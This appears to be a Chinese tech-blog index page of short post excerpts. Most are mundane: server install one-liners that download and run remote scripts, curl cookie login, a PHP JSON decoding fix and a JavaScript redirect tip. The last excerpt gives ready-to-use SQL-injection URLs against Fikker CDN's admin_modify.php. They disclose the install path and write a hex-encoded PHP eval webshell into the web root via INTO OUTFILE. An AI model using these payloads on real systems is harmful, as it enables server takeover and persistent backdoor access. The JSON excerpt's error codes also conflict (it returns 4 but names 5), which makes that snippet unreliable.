yum -y install wget;wget https://btpanel.net/install/install_6.0.sh && 

bash install_6.0.sh

» 阅读全文

经常会有一些设计到命令行下的登录获取信息，这个时候，就用到 shell curl了

curl命令参数：

-b 参数 指定使用cookie文件

-c是往cookie文件中写cookie

-d 是指定此次登录所需的参数，通过httpfox查看

-L 指定页面自动跳转

#curl -c ck.txt --user-agent Mozilla/4.0 -d "username=****&password=*****&server_id=1&submit=true" 登陆的url 

#curl -c ck.txt -b ck.txt --user-agent Mozilla/4.0 请求的url

» 阅读全文

json_decode 解析非标准json数据返回值为空 Null解决方法

<?php
$html= json数据 
var_dump(json_decode($html,true)); //return null
var_dump(json_last_error()); // return 4
?>

5 = JSON_ERROR_UTF8

大概意思就是语法错误，主要可能是接口方，获取获取的数据非标准或者含有非utf-8字符等

过滤方法

<?php
$html="json数据";
$html=preg_replace('/[\x00-\x1F\x80-\xFF]/', '', $html);
var_dump(json_decode($html, true));
var_dump(json_last_error());
?>

protected $methods          =   array('strict','order','alias','having',

'group','lock','distinct','auto','filter','validate','result',

'token','index',’force’,’master’);  //1、添加,’master’

» 阅读全文

这个主要是由于涉及到跳转链接的问题，解决方法很简单：

跳转的方式改为：

window.location.replace("1.html");

Caddy是一个使用Go语言写的HTTP Server，开在性能上或许比不上Nginx，但是在上手及配置难度上面真的是比Nginx简单许多。同时Caddy支持自动签订Let’s Encrypt SSL证书，只需要提供一个可用邮箱即可

wget -N --no-check-certificate https://raw.githubusercontent.com

/ToyoDAdoubi/doubi/master/caddy_install.sh && chmod +x caddy_install.sh 

&& bash caddy_install.sh install http.filemanager

Fikker 是一款面向 CDN/站长 的专业级网站缓存（Webcache）和反向代理服务器软件（Reversed Proxy Server）。近日在一起安全事件中发现fikker主控多个php文件存在高危注入漏洞，可获取Webshell 

#爆目录
admin_modify.php?id=-1%20union%20select%201,

@@basedir,3,4,5,6,7,8,9,10,11,12,13
#写一句话
admin_modify.php?id=1%20and%201=2%20union%20

select%200x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,

0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e,9,10,11,12,13%20into%20outfile%20%27d:/FikkerCDN/webroot/fikcdn/admin/test.php%27